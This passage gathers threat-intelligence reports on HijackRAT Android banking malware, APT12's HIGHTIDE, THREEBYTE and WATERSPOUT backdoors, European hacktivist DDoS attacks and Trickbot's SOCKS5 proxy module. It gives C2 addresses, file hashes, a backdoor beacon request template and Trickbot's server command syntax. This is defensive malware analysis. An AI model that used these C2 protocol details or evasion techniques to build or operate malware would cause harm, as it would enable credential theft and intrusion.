    are unconcerned about detection. In Canada and the U.K., attackers
    appear to be unconcerned about detection and pursue low-hanging fruit opportunistically.

Go to Source
Author: Rob Rachwald

The Service You Can’t Refuse: A Secluded HijackRAT

In Android world, sometimes you can’t stop malware from “serving”
you, especially when the “service” is actually a malicious Android
class running in the background and controlled by a remote access tool
(RAT). Recently, FireEye mobile security researchers have discovered
such a malware that pretends to be a “Google Service Framework” and
kills an anti-virus application as well as takes other malicious actions.

In the past, we’ve seen Android malware that execute privacy leakage,
banking credential theft, or remote access separately, but this sample
takes Android malware to a new level by combining all of those
activities into one app. In addition, we found the hacker has designed
a framework to conduct bank hijacking and is actively developing
towards this goal. We suspect in the near future there will be a batch
of bank hijacking malware once the framework is completed. Right now,
eight Korean banks are recognized by the attacker, yet the hacker can
quickly expand to new banks with just 30 minutes of work.

Although the IP addresses we have captured don’t reveal who the
attacker is, as the computer of the IP might be a victim as well, we
have found from the UI that both the malware developer and the victims
are Korean speakers.

Fig. 1. The structure of the HijackRAT malware.
Fig. 1. The structure of the HijackRAT malware.

The package name of this new RAT malware is “com.ll” and appears as
“Google Service Framework” with the default Android icon. Android
users can’t remove the app unless they deactivate its administrative
privileges in “Settings.” So far, the Virus Total score of the sample
is only five positive detections out of 54 AV vendors [1]. Such new
malware is published quickly partly because the CNC server, which the
hacker uses, changes so rapidly.

Fig. 2. The Virus Total detection of the malware
sample. [1]
Fig. 3. The fake “Google Service Framework” icon
in home screen.

A few seconds after the malicious app is installed, the “Google
Services” icon appears on the home screen. When the icon is clicked,
the app asks for administrative privilege. Once activated, the
uninstallation option is disabled and a new service named “GS” is
started as shown below. The icon will show “App isn’t
installed.” when the user tries to click it again and removes
itself from the home screen.

Fig. 4. The background service of the malware.
Fig. 4. The background service of the malware.

The malware has plenty of malicious actions, which the RAT can
command, as shown below.

8commands

Within a few minutes, the app connects with the CNC server and begins
to receive a task list from it:

get

The content is encoded by Base64 RFC 2045. It is a JSONObject with
content: {“task”: {“0”: 0}}, when decoded. The
server IP, 103.228.65.101, is located in Hong Kong. We cannot tell if
it’s the hacker’s IP or a victim IP controlled by the RAT, but the URL
is named after the device ID and the UUID generated by the CNC server.

The code below shows how the URL of the HTTP GET request is constructed:

code-get

– “UPLOAD PRIVACY DETAILS”

The task list shown above will trigger the first malicious action of
“Upload Phone Detail.” When executed, the user’s private information
will be uploaded to the server using HTTP POST request. The
information contains phone number, device ID, and contact lists as
shown below in the network packet of the request:

post

When decoded, the content in the red and blue part of the PCap are
shown below respectively:

1. The red part:

post-pcap-decrypt1

2. The blue part:

post-pcap-decrypt2

The contact list shown above is already highly sensitive, yet,
if the user has installed some banking applications, the malware
will scan for them too.

In a testing device, we installed the eight Korean bank apps as
shown below:

Fig. 5. The eight banking apps.
Fig. 5. The eight banking apps.

When this was done,  we found the value of
“banklist” in the PCap is no longer listed as N/A anymore:

8banks-pcap

The “banklist” entry in the PCap is filled with the short names
of the banks that we installed. There is a map of the short names
and package names of the eight banking apps installed on the phone:

table

The map of the banks is stored in a database and used in another
malicious action controlled by the CNC server too.

– “POP WINDOW”

In this malicious action, the CNC server sends a command to
replace the existing bank apps. The eight banking apps require the
installation of “com.ahnlab.v3mobileplus,” which is a popular
anti-virus application available on Google Play. In order evade any
detections, the malware kills the anti-virus application before
manipulating the bank apps. In the code as shown below, Conf.LV is
the “com.ahnlab.v3mobileplus” being killed.

killav

Then, the malware app parses the banking apps that the user has
installed on the Android device and stores them in the database
under /data/data/com.ll/database/simple_pref. The red block below
shows the bank list stored in the database:

db8banks

Once the corresponding command is sent from the RAT, the
resolvePopWindow() method will be called and the device will pop a
Window with the message: “The new version has been released. Please
use after reinstallation.”

code-popwindow

The malware will then try to download an app, named after
“update” and the bank’s short name from the CNC server,
simultaneously uninstalling the real, original bank app.

code-install

In the code shown above, “mpath” contains the CNC server IP
(103.228.65.101) and path (determined by the RAT); “mbkname” is the
bank name retrieved from the SQL lite database. The fake APK (e.g.
“updateBH.apk”) is downloaded from the CNC server, however
we don’t know what the fake apps look like because during the research
the command for this malicious action was not executed from the RAT.
Yet the source of the “update*.apk” is definitely not certified by the
banks and might be harmful to the Android user.

– “UPDATE”

When the command to “update” is sent from the RAT, a similar app –
“update.apk” is downloaded from the CNC server and installed in the
Android phone:

code-update

– “UPLOAD SMS”

When the command to upload SMS is received from the RAT, the SMS of
the Android phone will be uploaded to the CNC server. The SMS has been
stored in the database once received:

code-uploadsms

code-savesms

Then the SMS is read from the database and uploaded to the CNC server
once the command is received:

code-uploadsmscnc

– “SEND SMS”

Similarly, when the sending SMS command is received, the contact list
is sent through SMS.

code-sendsms

– “BANK HIJACK”

Interesting enough, we found a partially finished method called “Bank
Hijack.” The code below partially shows how the BankHijack method
works. The malware reads the short bank name, e.g. “NH”, and then
keeps installing the updateNH.apk from the CNC server until it’s of
the newest version.

code-hijack

So far the part after the installation of the fake app is not
finished yet. We believe the hacker is having some problems finishing
the function temporarily.

code-hijack-half

As shown above, the hacker has designed and prepared for the
framework of a more malicious command from the CNC server once the
hijack methods are finished. Given the unique nature of how this app
works, including its ability to pull down multiple levels of personal
information and impersonate banking apps, a more robust mobile banking
threat could be on the horizon.

REFERENCE

__________________________________________________

[1] https://www.virustotal.com/intelligence

Go to Source
Author: Jinjian Zhai

Darwin’s Favorite APT Group

Introduction

The attackers referred to as APT12 (also known as IXESHE, DynCalc,
and DNSCALC) recently started a new campaign targeting organizations
in Japan and Taiwan. APT12 is believed to be a cyber espionage group
thought to have links to the Chinese People’s Liberation Army. APT12’s
targets are consistent with larger People’s Republic of China (PRC)
goals. Intrusions and campaigns conducted by this group are in-line
with PRC goals and self-interest in Taiwan. Additionally, the new
campaigns we uncovered further highlight the correlation between APT
groups ceasing and retooling operations after media exposure, as APT12
used the same strategy after compromising the New York Times in Oct
2012. Much like Darwin’s theory of biological evolution, APT12 been
forced to evolve and adapt in order to maintain its mission.

The new campaign marks the first APT12 activity publicly reported
since Arbor Networks released their blog “Illuminating
The Etumbot APT Backdoor.
” FireEye refers to the Etumbot
backdoor as RIPTIDE. Since the release of the Arbor blog post, FireEye
has observed APT12 use a modified RIPTIDE backdoor that we call
HIGHTIDE. This
is the second time FireEye has discovered APT12 retooling after a
public disclosure
. As such, FireEye believes this to be a common
theme for this APT group, as APT12 will continue to evolve in an
effort to avoid detection and continue its cyber operations.

FireEye researchers also discovered two possibly related campaigns
utilizing two other backdoors known as THREEBYTE and WATERSPOUT. Both
backdoors were dropped from malicious documents built utilizing the
“Tran Duy Linh” exploit kit, which exploited CVE-2012-0158. These
documents were also emailed to organizations in Japan and Taiwan.
While APT12 has previously used THREEBYTE, it is unclear if APT12 was
responsible for the recently discovered campaign utilizing THREEBYTE.
Similarly, WATERSPOUT is a newly discovered backdoor and the threat
actors behind the campaign have not been positively identified.
However, the WATERSPOUT campaign shared several traits with the
RIPTIDE and HIGHTIDE campaign that we have attributed to APT12.

Background

From October 2012 to May 2014, FireEye
observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that
communicates via HTTP to a hard-coded command and control (C2) server.
RIPTIDE’s first communication with its C2 server fetches an encryption
key, and the RC4 encryption key is used to encrypt all further communication.

riptide-wireshark

Figure 1: RIPTIDE HTTP GET Request Example

In June 2014, Arbor
Networks published an article
describing the RIPTIDE backdoor
and its C2 infrastructure in great depth. The blog highlighted that
the backdoor was utilized in campaigns from March 2011 till May 2014.

Following the release of the article, FireEye observed a distinct
change in RIPTIDE’s protocols and strings. We suspect this change was
a direct result of the Arbor blog post in order to decrease detection
of RIPTIDE by security vendors. The changes to RIPTIDE were
significant enough to circumvent existing RIPTIDE detection rules.
FireEye dubbed this new malware family HIGHTIDE.

HIGHTIDE Malware Family

On Sunday August 24, 2014 we observed a
spear phish email sent to a Taiwanese government ministry. Attached to
this email was a malicious Microsoft Word document (MD5:
f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It
is worth noting that this email appeared to have been sent from
another Taiwanese Government employee, implying that the email was
sent from a valid but compromised account.

 

riptide-spear

Figure 2:  APT12 Spearphishing Email

The exploit document dropped the HIGHTIDE backdoor with the
following properties:

MD5 6e59861931fa2796ee107dc27bfdd480
Size 75264 bytes
Complie Time 2014-08-23 08:22:49
Import Hash ead55ef2b18a80c00786c25211981570

The HIGHTIDE backdoor connected directly to 141.108.2.157. If you
compare the HTTP GET request from the RIPTIDE samples (Figure 1) to
the HTTP GET request from the HIGHTIDE samples (Figure 3) you can see
the malware author changed the following items:

  • User Agent
  • Format and structure
    of the HTTP Uniform Resource Identifier (URI)

riptide2-wireshark

Figure 3: HIGHTIDE GET Request Example

Similar to RIPTIDE campaigns, APT12 infects target systems with
HIGHTIDE using a Microsoft Word (.doc) document that exploits
CVE-2012-0158. FireEye observed APT12 deliver these exploit documents
via phishing emails in multiple cases. Based on past APT12 activity,
we expect the threat group to continue to utilize phishing as a
malware delivery method.

MD5 File Name Exploit
73f493f6a2b0da23a79b50765c164e88 議程最新修正及注意事項.doc CVE-2012-0158
f6fafb7c30b1114befc93f39d0698560 0824.1.doc CVE-2012-0158
eaa6e03d9dae356481215e3a9d2914dc 簡易名冊0全國各警察機關主官至分局長.doc CVE-2012-0158
06da4eb2ab6412c0dc7f295920eb61c4 附檔.doc CVE-2012-0158
53baedf3765e27fb465057c48387c9b6 103年第3屆通訊錄.doc CVE-2012-0158
00a95fb30be2d6271c491545f6c6a707 2014 09 17 Welcome Reception for Bob
and Jason_invitation.doc
CVE-2012-0158
4ab6bf7e6796bb930be2dd0141128d06 產諮會_Y103(2)委員會_從東協新興國家崛起(0825).doc CVE-2012-0158

Figure 4: Identified exploit documents for HIGHTIDE 

When the file is opened, it drops HIGHTIDE in the form of an
executable file onto the infected system.

RIPTIDE and HIGHTIDE differ on several points: executable file
location, image base address, the User-Agent within the GET requests,
and the format of the URI. The RIPTIDE exploit document drops its
executable file into the C:Documents and Settings{user}Application
DataLocation folder while the HIGHTIDE exploit document drops its
executable file into the C:DOCUMENTS and SETTINGS{user}LOCAL
SETTINGSTemp folder. All but one sample that we identified were
written to this folder as word.exe. The one outlier was written as winword.exe.

Research into this HIGHTIDE campaign revealed APT12 targeted
multiple Taiwanese Government organizations between August 22 and 28.

THREEBYTE Malware Family

On Monday August 25, 2014 we observed a different spear phish email
sent from lilywang823@gmail.com to a technology company located in
Taiwan. This spear phish contained a malicious Word document that
exploited CVE-2012-0158. The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11.

Similar to the newly discovered HIGHTIDE samples documented above,
this malicious document dropped a backdoor to C:DOCUMENTS and
SETTINGS{user}LOCAL SETTINGSTempword.exe. This backdoor had the
following properties:

MD5 16e627dbe730488b1c3d448bfc9096e2
Size 75776 bytes
Complie Time 2014-08-25 01:22:20
Import Hash dcfaa2650d29ec1bd88e262d11d3236f

This backdoor sent the following callback
traffic to video[.]csmcpr[.]com:

threebyte-wireshark

Figure 5:  THREEBYTE GET Request Beacon

The THREEBYTE spear phishing incident (while not yet attributed)
shared the following characteristics with the above HIGHTIDE campaign
attributed to APT12:

  • The THREEBYTE backdoor was compiled two
    days after the HIGHTIDE backdoors.
  • Both the THREEBYTE and
    HIGHTIDE backdoors were used in attacks targeting organizations in
    Taiwan.
  • Both the THREEBYTE and HIGHTIDE backdoors were
    written to the same filepath of C:DOCUMENTS and
    SETTINGS{user}LOCAL SETTINGSTempword.exe.
  • APT12 has
    previously used the THREEBYTE backdoor.

WATERSPOUT Malware Family

On August 25, 2014, we observed another round of spear phishing
emails targeting a high-technology company in Japan. Attached to this
email was another malicious document that was designed to exploit
CVE-2012-0158. This malicious Word document had an MD5 of
499bec15ac83f2c8998f03917b63652e and dropped a backdoor to
C:DOCUMENTS and SETTINGS{user}LOCAL SETTINGSTempword.exe. The
backdoor had the following properties:

MD5 f9cfda6062a8ac9e332186a7ec0e706a
Size 49152 bytes
Complie Time 2014-08-25 02:10:11
Import Hash 864cd776c24a3c653fd89899ca32fe0b

The backdoor connects to a command and control server at icc[.]ignorelist[.]com.

Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an
HTTP-based backdoor that communicates with its C2 server.

GET
//<5 digit number>/<4 character string>.php?_id=<43 character string>= HTTP/1.1Accept: image/jpeg, application/x-ms-application,
image/gif, application/xaml+xml, image/pjpeg,
application/x-ms-xbap, */*

User-Agent: Mozilla/4.0
(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
.NET4.0C; .NET4.0E)

Host:

Cache-Control: no-cache

Figure 6: Sample GET request for WATERSPOUT backdoor

Although there are no current infrastructure ties to link this
backdoor to APT12, there are several data points that show a possible
tie to the same actors:

  • Same initial delivery method (spear
    phishing email) with a Microsoft Word Document exploiting
    CVE-2012-0158.

      • The same “Tran Duy Linh” Microsoft
        Word Exploit Kit was used in delivery of this backdoor.

        • Similar Targets were
          observed where the threat actors utilized this
          backdoor.

          • Japanese Tech Company
          • Taiwanese Government Organizations
          • Organizations in the Asia-Pacific Region that are of
            Interest to China
        • The
          WATERSPOUT backdoor was written to the same file path as the
          HIGHTIDE backdoors:

          • C:DOCUMENTS and
            SETTINGS{user}LOCAL SETTINGSTempword.exe
          • C:DOCUMENTS and SETTINGS{user}LOCAL
            SETTINGSTempwinword.exe
        • WATERSPOUT was compiled within two days of the last
          HIGHTIDE backdoor and on the same day as the THREEBYTE
          backdoor.
        • APT12
          closely monitors online media related to its tools and
          operations and reacts when its tools are publicly
          disclosed.
        • APT12 has the ability to adapt quickly to
          public exposures with new tools, tactics, and procedures
          (TTPs).
        • Public disclosures may result in an immediate
          change in APT12’s tools. These changes may be temporary and
          FireEye believes they are aimed at decreasing detection of
          their tools until a more permanent and effective TTP change
          can be implemented (e.g., WATERSPOUT).

    Although these points do not
    definitively tie WATERSPOUT to APT12, they do indicate a
    possible connection between the WATERSPOUT campaign, the
    THREEBYTE campaign, and the HIGHTIDE campaign attributed to
    APT12.

    Conclusion

    FireEye believes the change from
    RIPTIDE to HIGHTIDE represents a temporary tool shift to
    decrease malware detection while APT12 developed a completely
    new malware toolset. These development efforts may have resulted
    in the emergence of the WATERSPOUT backdoor.

    12-timeline

    Figure 7: Compile dates for all three malware
    families 

    APT12’s adaptations to public disclosures
    lead FireEye to make several conclusions about this threat
    group:

    Though public disclosures resulted in APT12
    adaptations, FireEye observed only a brief pause in APT12
    activity before the threat actors returned to normal activity
    levels. Similarly, the public disclosure of APT12’s intrusion at
    the New York Times also led to only a brief pause in the threat
    group’s activity and immediate changes in TTPs. The pause and
    retooling by APT12 was covered in the Mandiant
    2014 M-Trends report
    . Currently, APT12 continues to target
    organizations and conduct cyber operations using its new tools.
    Most recently, FireEye observed HIGHTIDE at multiple
    Taiwan-based organizations and the suspected APT12 WATERSPOUT
    backdoor at a Japan-based electronics company. We expect that
    APT12 will continue their trend and evolve and change its
    tactics to stay ahead of network defenders.

    Note: IOCs
    for this campaign can be found here.

Go to Source
Author: Ned Moran

Europe’s Hacktivists Set Sights on Political Entities

The tumultuous state of global politics that has come to define 2017 continues to shape the motivations and schemes of a wide range of adversaries. In October, CNBC reported two Czech election websites were hacked and that, after Catalonia’s independence referendum was ruled illegal, the website for Spain’s Constitutional Court was taken down by a DDoS attack. These are just two of many examples that align with a trend Flashpoint analysts have observed in recent months: the proliferation of hacktivist activity targeting European government and political entities.

In early September, Flashpoint analysts observed multiple hacktivist-fueled DDoS attacks against several websites belonging to ministries and individual public officials in multiple European countries. Although these campaigns have been characterized by DDoS attacks dispersed across central Europe, some actors have tended to concentrate their activity on certain countries. For example, analysts have observed that one Turkish nationalist group appears to be focused on targeting the websites of Belgian and Austrian political entities. This group has also indicated its intent to retaliate against any perceived anti-Turkish or anti-Muslim sentiment emanating from European political entities. In one instance, the group posted screenshots of successful DDoS attacks against Danish government institutions. They claim to have carried out the attacks due to perceived insults by Danish politicians against Islam.

While hacktivist groups are often considered less skilled than their cybercriminal and state-sponsored counterparts, the risks and resulting damages they can inflict are by no means novel. Typically motivated by fundamental and political differences of opinion, hacktivist campaigns have been known to disrupt, deface, or otherwise take down targeted websites, web-based services, networks, and infrastructure. Unfortunately, these types of damages became a reality for many following the recent hacktivist-fueled DDoS attacks that correlated with major 2017 elections in the United Kingdom, Germany, Russia, Czech Republic, and France. It appears that the polarizing effect of these elections continues to contribute to the heightened risks faced by various European political entities.

Flashpoint assesses with a moderate degree of confidence that hacktivist-fueled DDoS attacks against European political entities may continue in the coming months. While addressing hacktivist activity can be complex and challenging, organizations—not just in Europe, but worldwide—that integrate Business Risk Intelligence (BRI) into their security and risk strategies can and do mitigate these types of risks more effectively. By providing proactive visibility into rising geopolitical tensions, emerging hacktivist threats, and upcoming schemes, BRI enables organizations across all sectors to gain a decision advantage over a broad spectrum of hacktivists and other adversaries.

Want to learn more about the hacktivist DDoS landscape in Europe? Watch our Flash Talk on Turkish Hacktivism here.

The post Europe’s Hacktivists Set Sights on Political Entities appeared first on Flashpoint.

Go to Source
Author: Flashpoint

Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model

Individuals who reuse login credentials across multiple sites are more susceptible to account checking attacks, which occur when threat actors use credentials stolen from past database breaches or compromises to gain unauthorized access to other accounts belonging to the same victims. However, the process of mining compromised data for correct username and password combinations requires significant computer processing power and proxy pool lists to be successful — a capability that is now exhibited by the Trickbot gang.

Considered to be the successor of the formidable Dyre banking Trojan gang, the Trickbot banking Trojan gang continues to evolve by adopting new attack methods and targeting various industries. While Trickbot predominantly targeted the financial industry, it has now expanded its targeting of other industries via its account checking activities; these are perpetrated through the backconnect SOCKS5 module enlisting victims as proxies. Enlisting victims as its proxies allows the gang to perform account checking activity with the same IP as its victims. The gang account checking operation requires a steady stream of new and “clean” proxies to make sure their activities wouldn’t get automatically blocked by companies’ automatic IP origin anti-fraud systems. Therefore, their existing infections are turned into account checking proxies.

Image 1: The process of Trickbot’s backconnect proxy account checking activity. In the first step, the Trickbot gang distributes email spam. In the second step, the victim opens the spam attachment. In the third step, Trickbot downloads and executes the payload from the payload server on the compromised machine. In the fourth step, the victim machine downloads the backconnect SOCKS5 proxy module from the module server. Then, the victim connects to the preconfigured gang’s backconnect server. Finally, the Trickbot gang connects to the victim enlisting their machine’s IP as its proxy for account checking activities via its backconnect SOCKS5 module.

The Trickbot gang continues to search for ways to monetize infections by adopting a hybrid attack model, which utilizes both Trickbot modular payloads and knowledgeable fraud operators. The Trickbot gang has also extended its operations to include account checking activity; such attacks are a combination of malware expertise and knowledgeable human operators. This hybrid approach allows Trickbot operators to launch account checking attacks leveraging infected victims as proxies.

Distributed through malicious Microsoft Office documents via email spam campaigns, Trickbot is notable for loading its backconnect SOCKS5 module bcClientDllTest onto compromised machines. This module is used extensively by the gang for account checking activity.

From Aug. 17 to the present, analysts observed close to 6,000 unique compromised machines associated with Trickbot SOCKS5 proxy module activities. Of these machines, more than 200 of them were actively enlisted for account checking fraud activities at any one time.

Image 2: The Trickbot SOCKS5 backconnect module contains authorization backconnect logic to check in to the backend.

Trickbot utilizes a backconnect communication protocol maintaining the following commands, which are used for client-server communications initially with the command prefix “c”:

● disconnect: Terminate the backconnect server connection
● idle: Maintain the client-server connection
● connect: connect to the backconnect server. The command must consist of the following parameters:

○ ip: Backconnect server’s IP address
○ auth_swith: Use authorization flag. If the value is set to “1”, the Trojan receives the auth_login and auth_pass parameters. If the value is “0”, the Trojan gets the auth_ip parameter. Otherwise, the connection will not be established.
○ auth_ip: Authentication IP address
○ auth_login: Authentication login
○ auth_pass: Authentication password

Image 3: A Trickbot victim connects to the Trickbot backconnect server.

There are three main Trickbot SOCKS5 server-client commands:

● c=idle
● c=disconnect
● c=connect

Trickbot victims create a sequence of GET requests to the server on gate[.]php:

● client_id=&connected=&server_port=&debug=

The server responds with a POST request with the following parameters if the connection needs to be established:

● c=connect&ip=&auth_swith=&auth_ip=&auth_login=&auth_pass=

If the connection needs to be terminated, the server will respond with c=disconnect.

Image 4: The Trickbot machine actively pings the server every 100 seconds.

Most notably, once compromised, Trickbot targets customers of financial institutions via webinjects and redirection attacks. The Trojan also uses victim IPs as proxies to leverage username and password combinations for account checking activity. The observed account checking activity mainly targets customers of companies in nine industries, most of those in gaming. Notably, some of the targets appear to be Russia-based companies.

Image 5: Trickbot account checking activities mainly target customers in nine industries.

Trickbot account checking activity is mainly directed to customers of U.S.- and Russia-based companies operating in the following industries:

● Gaming
● Technology
● Financial
● Entertainment
● Adult
● Social Media
● Retail
● Rewards
● Cryptocurrency

Likely leveraging commercial account checker tools, the Trickbot gang and its associates heavily utilize its victims’ IPs as proxies for account checking activity that imitates mobile device-based account logins. Their attacks leave various web applications artifacts such as spoofed user agent information and device information, indicating as if the activity was being performed leveraging mobile devices. Such mobile logins are meant to bypass traditional anti-fraud controls that are largely implemented to address web-based logins. In cybercriminals’ pursuit of targets, their attempts at evading anti-fraud systems are thus dictated by a company’s anti-fraud controls, which are in turn influenced by cybercriminal tactics, techniques, and procedures (TTPs). Analysts assess with moderate confidence the Trickbot operators will likely continue to monetize infections by turning victims’ IPs into proxies that subsequently fuel account checking activities.

The post Trickbot Gang Evolves, Incorporates Account Checking Into Hybrid Attack Model appeared first on Flashpoint.

Go to Source
Author: Flashpoint